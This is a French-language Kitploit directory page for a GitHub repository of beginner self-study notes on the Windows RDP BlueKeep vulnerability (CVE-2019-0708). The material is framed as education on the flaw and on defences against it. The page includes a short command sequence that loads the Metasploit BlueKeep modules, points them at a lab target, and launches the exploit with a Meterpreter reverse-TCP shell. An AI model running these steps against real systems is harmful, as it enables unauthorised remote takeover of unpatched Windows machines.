Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-0708-Windows — Cet article abordera la vulnérabilité du service Bureau à distance de Windows (CVE-2019-0708) et expliquera en détail cette vulnérabilité ainsi que les mesures de défense. En tant que débutant en cybersécurité, l'auteur partage avec vous quelques tutoriels d'auto-apprentissage de base, principalement des notes en ligne sur les outils de sécurité et les opérations pratiques. J'espère qu'ils vous plairont. De plus, je souhaite vivement que vous puissiez réaliser les manipulations avec moi et progresser ensemble. Par la suite, j'approfondirai les connaissances en cybersécurité et en sécurité des systèmes, et partagerai les expériences correspondantes. En somme, j'espère que cette série d'articles sera utile aux amis lecteurs du blog. Écrire des articles n'est pas chose aisée ; experts, si cela ne vous plaît pas, merci de ne pas critiquer. Merci ! | Kitploit
Outils/GitHubGitHub/eastmountyxz/cve-2019-0708-windows
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique
GitHubeastmountyxz/cve-2019-0708-windows

CVE-2019-0708-Windows

Voir le dépôt
5210il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Cet article abordera la vulnérabilité du service Bureau à distance de Windows (CVE-2019-0708) et expliquera en détail cette vulnérabilité ainsi que les mesures de défense. En tant que débutant en cybersécurité, l'auteur partage avec vous quelques tutoriels d'auto-apprentissage de base, principalement des notes en ligne sur les outils de sécurité et les opérations pratiques. J'espère qu'ils vous plairont. De plus, je souhaite vivement que vous puissiez réaliser les manipulations avec moi et progresser ensemble. Par la suite, j'approfondirai les connaissances en cybersécurité et en sécurité des systèmes, et partagerai les expériences correspondantes. En somme, j'espère que cette série d'articles sera utile aux amis lecteurs du blog. Écrire des articles n'est pas chose aisée ; experts, si cela ne vous plaît pas, merci de ne pas critiquer. Merci !

Partager

CVE-2019-0708-Windows

Cet article partagera la vulnérabilité du service Bureau à distance Windows (CVE-2019-0708), et expliquera en détail cette vulnérabilité ainsi que les mesures défensives. En tant que débutant en cybersécurité, l'auteur partage quelques tutoriels d'auto-apprentissage, principalement des notes en ligne sur les outils de sécurité et leur mise en pratique. J'espère qu'ils vous plairont. Surtout, j'espère que vous pourrez avancer et progresser avec moi ; par la suite, nous approfondirons les connaissances en cybersécurité et en sécurité des systèmes et partagerons des expériences connexes. En résumé, j'espère que cette série d'articles sera utile aux amis blogueurs ; écrire des articles n'est pas facile, les experts, si cela ne vous plaît pas, ne critiquez pas, merci !


Blog correspondant :
[Auto-apprentissage cybersécurité] 58. Exploitation des vulnérabilités Windows - Retour sur CVE-2019-0708 et reverse shell Metasploit
[Auto-apprentissage cybersécurité] 44. Reproduction et explication détaillée de la vulnérabilité du service Bureau à distance Windows (CVE-2019-0708)


Commandes clés :

root@kitploit:~
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

# 开启工具
msfconsole
reload_all
search 0708

# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 查看信息
show options
show targets
info

# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3

# 运行脚本
run
exploit

# 设置带宽
Set GROOMSIZE 40

Références :
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708

Télécharger l’outil